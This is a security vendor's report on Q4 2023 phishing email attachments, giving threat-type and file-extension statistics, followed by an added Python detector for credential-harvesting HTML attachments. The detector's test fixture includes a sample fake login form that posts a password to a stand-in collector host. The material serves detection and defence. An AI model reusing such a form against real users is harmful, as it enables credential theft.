Statistical Report on Phishing Email in Q4 2023

Overview

AhnLab SEcurity intelligence Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and a honeypot. This post covers phishing emails distributed during the fourth quarter of 2023 (October, November, and December) and provides statistics on each type. Phishing is generally described as an attack that leaks users’ login account credentials by disguising itself as or impersonating an institution, company, or individual through social engineering. More broadly, it is a technical subterfuge that lets the threat actor carry out attacks such as information leaks, malware distribution, and online fraud against various targets.

This post focuses on phishing attacks delivered through email, which is how they mainly occur, and gives a detailed classification of the attack methods based on phishing emails. To help minimize damage to users, we also introduce new attack types that have not been seen before and emails that require users’ caution, along with their keywords. Only phishing emails with attachments are covered; emails that carry malicious links in the body without attachments are excluded.

Statistics

1) Statistics on Attachment Threat Types

In the fourth quarter of 2023, the most prevalent threat type among phishing email attachments was FakePage (50%). This is the type where threat actors mimic login pages, logos, fonts, and display layouts of advertising pages to create deceptive pages that can lure users into entering their account credentials. Subsequently, the threat actors transmit this information to their C2 server or lead users to fake sites. The second most common threat type was Infostealer (23%), exemplified by malware strains like AgentTesla, FormBook, and AveMaria. These malware strains compromise user information stored in web browsers, emails, FTP clients, and similar applications. The third prevalent threat type was Trojan (13%), with other identified types being Downloader (12%), Exploit (1%), and Backdoor (1%) in that descending order. Compared to the statistics from the third quarter, notable trends include a 12% increase in the proportion of FakePage (50%) and a 9% decrease in the proportion of Trojan (13%). The proportions of Infostealer (23%) and Downloader (12%) showed similar trends to those of the third quarter.


2) Statistics on Attachment Extension Types

In the fourth quarter of 2023, among phishing email attachment extensions, the most common type was compressed files (41%). Upon extraction, these files may contain various malware, including Infostealers and Downloaders. The extensions distributed were 7Z (13%), RAR (8%), and ZIP (4%) in that descending order. The second most common file extension type was web page scripts (39%), representing documents executed in web browsers, such as FakePages. The distributed extensions were HTML (22%), HTM (8%), and SHTML (5%). Additionally, Documents (10%), Images (9%), and Executables (PE, 1%) were identified. Compared to the third quarter statistics, the trends in the fourth quarter show that for the compressed file type (45%), the 7Z extension increased by 9% compared to the third quarter, while the ZIP extension, which had the highest proportion in the third quarter, decreased by 6%. For script (13%) types, compared to the third quarter, there was an 8% increase in the HTML extension and a 9% decrease in the HTM extension. In image files (9%), the distribution of ISO extensions decreased by 5%, resulting in a 1% decrease in quantity relative to the total, while the IMG extension showed a trend of increasing by 3%.
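
As an added example (not from ASEC's report or tooling), the sketch below shows a heuristic a mail gateway could apply to the FakePage threat type and the web page script attachments (HTML, HTM, SHTML) described above: it flags attached pages that collect a password and reports any remote host the form posts to. The function names and sample pages are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Web page script extensions the report lists for FakePage attachments.
SCRIPT_EXTS = (".html", ".htm", ".shtml")

# Constructed sample attachments (not taken from the report).
SAMPLE_FAKEPAGE = ('<form action="https://collector.example.invalid/p" method="post">'
                   '<input type="text" name="u"><input type="password" name="p"></form>')
SAMPLE_BENIGN = '<form action="/search"><input type="text" name="q"></form>'


class FormScanner(HTMLParser):
    """Records each form's action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of {"action": str, "password": bool}
        self._open = None    # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._open)
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._open is None:  # password field outside any <form>
                self._open = {"action": "", "password": False}
                self.forms.append(self._open)
            self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def scan_attachment(filename, body):
    """Return heuristic findings for an HTML attachment that asks for a password."""
    if not filename.lower().endswith(SCRIPT_EXTS):
        return []  # only web page script attachments are inspected here
    scanner = FormScanner()
    scanner.feed(body)
    findings = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        host = urlparse(form["action"]).netloc
        if host:
            findings.append(f"password form posts to remote host {host}")
        else:
            findings.append("password field in attached page with no remote form action")
    return findings
```

A hit is a reason to quarantine or review the message, not proof of phishing; a page that submits credentials through script rather than a form action only produces the second finding.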